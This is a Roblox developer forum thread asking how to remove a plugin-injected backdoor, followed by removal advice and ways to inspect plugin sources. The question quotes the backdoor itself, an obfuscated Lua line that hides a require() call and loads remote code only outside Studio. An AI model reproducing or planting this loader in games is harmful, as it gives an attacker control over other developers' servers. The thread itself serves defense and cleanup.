Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

How do I remove a (i think) plugin-based backdoor?

Asked by
RoboZB 2
4 years ago

I've installed a few plugins and suddenly my game keeps getting:

if not game:GetService("RunService"):IsStudio() then getfenv()['\114\101\113\117\105\114\101'](238754.208233*12851-.0023)() end

placed into a script with no name into ServerScriptService. I have looked it up on Google and it appears to be made by a v3rmillion user. How do I remove this?

Thank you,

RoboZB

0
@RoboZB well you could start by removing the plugins that may have been causing the backdoor but if needed just completely delete all the plugins are reinstall the safe ones. If I recall there is a Plugins folder on your pc installed by Roblox which you can also delete. If you still can't get it removed just uninstall Roblox and reinstall it. BlackOrange3343 2676 — 4y
0
Anything Called AntiLag?! or NoLag That is a script BURN THEM BURN THEM IN THE FLAMES OF HECC Vortex_Vasne 89 — 4y
0
You should ask in the discord for these types of questions to avoid getting a moderation claim. hiimgoodpack 2009 — 4y

1 answer

Log in to vote
0
Answered by 4 years ago

Solution 1: Server Defender
Server Defender is a ROBLOX antivirus plugin that scans scripts for Name, Structure, and Code Verification. It also scans your plugins. You can get it here
Solution 2: Seeing there source
I only know this on Windows, sorry. Open up File Explorer and type in C:\Users\USER\AppData\Local\Roblox\ROBLOXUSERID and scroll down to any plugin ID and open it with Notepad or Notepad++ or any text editing software. You'll see stuff like "NUL" so it's not really clear. Or you can run game:GetService("InsertService"):LoadAsset(PLUGINID).Parent = workspace so you can see their sources clearer. (YOU MUST OWN THE ASSET IN ORDER TO INSERT IT!!!)
Regards, Vivilian9

0
PS. Sorry for answering late! ViviTheLuaKing 103 — 4y
Ad

Answer this question